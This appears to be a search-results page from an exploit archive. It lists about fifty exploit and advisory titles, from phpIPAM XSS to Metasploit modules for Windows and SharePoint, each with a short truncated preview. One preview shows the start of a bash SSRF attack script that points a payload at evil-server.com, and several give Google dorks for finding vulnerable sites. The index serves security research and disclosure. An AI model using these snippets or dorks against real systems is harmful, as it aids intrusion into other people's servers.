50748 matches found
📄 phpIPAM 1.6 Cross Site Scripting
phpIPAM version 1.6 suffers from a cross site scripting vulnerability. Exploit Title: phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php Date: 2024-10-26 Exploit Author: CodeSecLab Vendor Homepage: https://github.com/phpipam/phpipam Software Link: https://github.com/phpipam/phpipam...
SofaWiki 3.9.2 Shell Upload
Exploit Title: SofaWiki 3.9.2 - Remote Code Execution RCE via Open Ticket File Upload Date: 10/17/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.sofawiki.com Software Link: https://www.sofawiki.com/site/files/snapshot.zip Version: 3.9.2 Tested on: Windows XP Summary: A remote co...
OpenMediaVault 7.4.2-2 Code Injection
============================================================================================================================================= | Title : OpenMediaVault 7.4.2-2 Code Injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox 130.0.2 6...
HaoKeKeJi YiQiNiu Server-Side Request Forgery
!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...
WordPress Backup Migration 1.3.7 Remote Code Execution
Vulnerability Summary from Wordfence Intelligence Description: Backup Migration = 1.3.7 backup-backup Unauthenticated Remote Code Execution Affected Plugin: Backup Migration Plugin Slug: backup-backup Affected Versions: = 1.3.7 CVE ID:CVE-2023-6553 Pending CVSS Score: 9.8 Critical CVSS Vector:...
SAP Enable Now Manager 10.6.5 Build 2804 Cloud Edition CSRF / XSS / Redirect
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: SAP® Enable Now Manager vulnerable version: 10.6.5 Build 2804 Cloud Edition fixed version: May 2023 Release CVE number: N/A cloud impact...
Linux watch_queue Filter Out-Of-Bounds Write
Linux: watchqueue filter OOB write and other bugs This bug report is about things in the watchqueue subsystem, which is only enabled under CONFIGWATCHQUEUE. That seems to be disabled e.g. on Debian, but Ubuntu and Fedora enable it. The watchqueue subsystem has a bug that leads to out-of-bounds...
Social Codia SMS 1 Cross Site Scripting
sms-AddStudent-StoredXSS-POC Author: D4rkP0w4r Description = StoredXSS at Add Student Step to Reproduct Login to admin - Students - Add Student - input payload at Enter Name Exploit Input payload at Enter Name - clicked Add Students - access All Student - The XSS will trigger Log out admin and...
TestLink 1.19 Arbitrary File Download
Exploit Title: TestLink 1.19 - Arbitrary File Download Unauthenticated Google Dork: inurl:/testlink/ Date: 07/12/2021 Exploit Author: Gonzalo Villegas Cl34r Exploit Author Homepage: https://nch.ninja Vendor Homepage: https://testlink.org/ Version:1.16 = 1.19 CVSS:...
Ericsson Network Location MPS GMPC21 Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ericsson Network Location MPS - Restrictions Bypass RCE Meow Variant', 'Description' = %q This module exploits an arbitrary command execution...
Trojan.Win32.Akl.bc Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/0b2a0f61a209e24a7d7b2c2d5efb4d68.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Akl.bc Vulnerability: Insecure Permissions Description: The malware creates an dir name...
Simplephpscripts Simple CMS 2.1 SQL Injection
Document Title: =============== Simplephpscripts Simple CMS v2.1 - SQL Injection References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2303 Release Date: ============= 2021-10-19 Vulnerability Laboratory ID VL-ID: ==================================== 2303...
WhatsUpGold 21.0.3 Cross Site Scripting
Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting XSS Date: 09.17.2021 Exploit Author: Andreas Finstad 4ndr34z Vendor Homepage: https://www.whatsupgold.com Version: v.21.0.3, Build 188 Tested on: Windows 2019 Server CVE : CVE-2021-41318 Reference:...
XAMPP 7.4.3 Privilege Escalation
Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation Exploit Author: Salman Asad @deathflash1411, [email protected] Original Author: Maximilian Barz @S1lkys Date: 27/09/2021 Vendor Homepage: https://www.apachefriends.org Version: XAMPP 7.2.29, 7.3.x 7.3.16 & 7.4.x 7.4.4 Tested on: Windows 10 +...
Online Documents Sharing Platform 1.0 SQL Injection
Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection Date: 21.01.2021 Exploit Author: CANKAT ÇAKMAK Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html Software Link:...
WordPress Total Upkeep 1.14.9 Backup Disclosure
Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download Google Dork: intitle:"Index of" AND "wp-content/plugins/boldgrid-backup/=" Date: 2020-12-12 Exploit Author: Wadeek Vendor Homepage: https://www.boldgrid.com/ Software Link:...
Sage DPW 2020_06_000 / 2020_06_001 XSS / File Upload
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Reflected Cross-Site Scripting and Unauthenticated Malicious File Upload product: Sage DPW vulnerable version: 202006000 & 202006001 fixed version: 202006002 CVE number:...
Seo Panel 4.7.0 Cross Site Scripting
Exploit Title: Seo Panel 4.7.0 Reflected XSS Exploit Author: Arzu DEMÝREZ Date: 05.03-2024 Vendor Homepage: https://www.seopanel.org/ Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.7.0 Version: Seo Panel 4.7.0 -Description: A cross-site scripting XSS issue in the SEO admin...
Microsoft Windows 10.0.17763.5458 Privilege Escalation
Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 This module requires Metasploit: https://metasploit.com/download Author : E1.Coders Contact : E1.Coders at Mail dot RU Security Risk : High require 'msf/core' class...
Sharepoint Dynamic Proxy Generator Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'securerandom' class MetasploitModule 'Sharepoint Dynamic Proxy Generator Unauth RCE', 'Description' = %q This module exploits two vulnerabilities in Sharepoint...
Blood Bank 1.0 SQL Injection
Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability Date: 2023-11-14 Exploit Author: Ersin Erenler Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code Software Link: https://download-media.code-projects.org/2020/11/BloodBankInPHPWithSourcecode.zip Version: 1.0...
CMS Made Simple 2.2.19 Server-Side Template Injection
Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI Date: 2024-21-02 Exploit Author: tmrswrr Vendor Homepage: https://www.cmsmadesimple.org/ Version: 2.2.19 Tested on: https://www.softaculous.com/demos/CMSMadeSimple 1 log in as admin and go to Layout Design Manager Breadcrumbs 2 Click edit and...
Adapt CMS 3.0.3 Cross Site Scripting / Shell Upload
Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3 Date: 02/2024 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Ubuntu 22.04 Blog: http://msecureltd.blogspot.com Description - It was found that adaptcms v3.0.3 was vulnerable to stored cross site scripting - Also the application allowed...
Xitami 2.5 Denial Of Service
!/usr/bin/perl use IO::Socket::INET; Exploit Title: Xitami 2.5 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 14 january 2024 Vendor Homepage: https://imatix-legacy.github.io/xitami.com/ Download to demo:...
RTPEngine mr11.5.1.6 Denial Of Service
RTPEngine susceptible to Denial of Service via DTLS Hello packets during call initiation - Fixed versions: mr12.1.1.2, mr12.0.1.3, mr11.5.1.16, mr10.5.6.3, mr10.5.6.2 - Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-03-rtpengine-dtls-hello-race - Vendor...
Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation
KL-001-2023-002: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump Advisory ID: KL-001-2023-002 Publication Date: 2023.08.17 Publication URL:...
Textpattern CMS 4.8.8 Command Injection
Exploit Title: Textpattern CMS v4.8.8 - Command Injection Authenticated Date: 2023-06-15 Exploit Author: tmrswrr Vendor Homepage: https://textpattern.com/ Software Link: https://textpattern.com/filedownload/118/textpattern-4.8.8.zip Version: v4.8.8 Tested : https://release-demo.textpattern.co/ --...
AD Manager Plus 7122 Remote Code Execution
Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...
Microsoft SQL Server 2014 / 2016 / 2017 / 2019 / 2022 Audit Logging Failure
Title: Microsoft SQL Server Password Hash Exposure Product: Database Manufacturer: Microsoft Affected Versions: 2012-2022 Risk Level: Medium CVE Reference: N/A Author of Advisory: Emad Al-Mousa Overview: SQL Server is a popular database system, and database systems are a vital backbone in IT...
Microsoft Office Word MSDTJS Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Microsoft Office Word MSDTJS', 'Description' = %q This module generates a malicious Microsoft Word document that when loaded, will leverage the...
Backdoor.Win32.Kilo.016 Denial Of Service
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/9ede6951ea527f96a785c5e32b5079e6.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Kilo.016 Vulnerability: Denial of Service UDP Datagram Description: The malware liste...
WordPress All-In-One Video Gallery 2.4.9 Local File Inclusion
Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion LFI Exploit Author: Mohamed Magdy Abumusilm Aka m19o Software: All-in-One Video Gallery plugin Version: = 2.4.9 Tested on: Windows,linux Poc:...
Backdoor.Win32.Hupigon.bnbb Unquoted Service Path
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/0857f2c8541dba287d648eec17163d3f.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Hupigon.bnbb Vulnerability: Insecure Service Path Description: The malware creates a...
Oracle Fatwire 6.3 Cross Site Scripting / SQL Injection
Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities Date: 29/07/2021 Exploit Author: J. Francisco Bolivar @Jfrancbit Vendor Homepage: https://www.oracle.com/index.html Version: 6.3 Tested on: CentOS 1. Xss Adt parameter is vulnerable to Xss:...
WonderCMS 3.1.3 Code Execution / Server-Side Request Forgery
Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution Date: 2020-11-27 Exploit Author: zetc0de Vendor Homepage: https://www.wondercms.com/ Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip Version: 3.1.3 Tested on: Ubuntu...
Webexcels Ecommerce CMS 2.x SQL Injection / Cross Site Scripting
Exploit Title: Webexcels Ecommerce CMS SQL Injection & XSS Vulnerability Google Dork: intext:intext:" By WEB EXCELS "+inurl:"?Id=" Date: 2020-03-27 Exploit Author: @ThelastVvV Vendor Homepage: https://www.webexcels.com/ Version: 2.x 2017,2018,2019,2020 Tested on: Ubuntu...
Joomla EasyBookReloaded 3.3.2 SQL Injection
Exploit Title : Joomla EasyBookReloaded Components 3.3.2 SQL Injection Author Discovered By : KingSkrupellos Team : Cyberizm Digital Security Army Date : 14/02/2019 Vendor Homepage : joomla-extensions.kubik-rubik.de Software Download Link :...
Joomla PhocaDownload 3.1.7 Database Disclosure / SQL Injection
Exploit Title : Joomla PhocaDownload Components 3.1.7 SQL Injection / Database Disclosure Author Discovered By : KingSkrupellos Team : Cyberizm Digital Security Army Date : 04/02/2019 Vendor Homepage : phoca.cz Software Download Links : phoca.cz/download/category/4-phoca-download-component...
Oracle WebLogic Server Java Deserialization Remote Code Execution
Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow , Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html Affetcted Version...
3DSecure 2.0 3DS Authorization Method Cross Site Request Forgery
Product: 3DSecure 2.0 Manufacturer: Redsys Affected Versions: 3DSecure 2.0 3DS Authorization Method Tested Versions: 3DSecure 2.0 3DS Authorization Method Vulnerability Type: Cross-Site Request Forgery CSRF Risk Level: Medium Solution Status: Not yet fixed Manufacturer Notification: 2024-01-17...
SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure
CyberDanube Security Research 20240604-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| SEH utnserver Pro/ProMAX / INU-100 vulnerable version| 20.1.22 fixed version| 20.1.28 CVE number| CVE-2024-5420, CVE-2024-5421,...
AMPLE BILLS 0.1 SQL injection
Title: AMPLE BILLS 0.1 Multiple-SQLi Author: nu11secur1ty Date: 04/13/2024 Vendor: https://www.mayurik.com/ Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html Reference: https://portswigger.net/web-security/sql-injection...
VMware Cloud Director 10.5 Authentication Bypass
Exploit Title: VMware Cloud Director | Bypass identity verification Google Dork: non Date: 12/06/2023 Exploit Author: Abdualhadi khalifa Version: 10.5 CVE : CVE-2023-34060 import requests import paramiko import subprocess import socket import argparse import threading Define a function to check i...
Windows SpoolFool Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2022-21999 SpoolFool Privesc', 'Description' = %q The Windows Print Spooler has a privilege escalation vulnerability that can be leveraged to...
OrbiTeam BSCW Server XSS / LFI / User Enumeration
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities in BSCW Server product: OrbiTeam BSCW Server vulnerable version: BSCW Server 5.0.x, 5.1.x, =5.2.4, =7.3.x, =7.4.3 fixed version: 5.2.5, 7.4.4 CVE...
Sonicwall SonicOS 7.0 Host Header Injection
Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection Google Dork: inurl:"auth.html" intitle:"SonicWall" intitle:"SonicWall Analyzer Login" Discovered Date: 03/09/2020 Reported Date: 07/09/2020 Exploit Author: Ramikan Vendor Homepage:sonicwall.com Affected Devices: All SonicWall Next Gen 6...
Document Management System 1.0 SQL Injection / Remote Code Execution
Exploit Title: Document Management System - SQL Injection to RCE webshell Date: 23/04/21 Exploit Author: Richard Jones Vendor Homepage: https://www.sourcecodester.com/php/7652/document-management-system.html Version: 1.0 Tested on: Windows 10 build 19041 + xampp 3.2.4 !/usr/bin/python3 import...
Backdoor.Win32.Kwak.12 Authentication Bypass / Code Execution
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c25393545e5ead3a35996ef9a887bd34.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Kwak.12 Vulnerability: Remote Command Execution Description: The backdoor runs an FTP...
Rocket.Chat 3.7.1 Email Address Enumeration
Trovent Security Advisory 2010-01 Email address enumeration in reset password Overview Advisory ID: TRSA-2010-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2010-01 Affected product: Web application Rocket.Chat Affected version: = 3.7.1 Vendor:...
Responsive Online Blog 1.0 SQL Injection
Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection Date: 2020-06-23 Exploit Author: Eren Şimşek Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html Software Link:...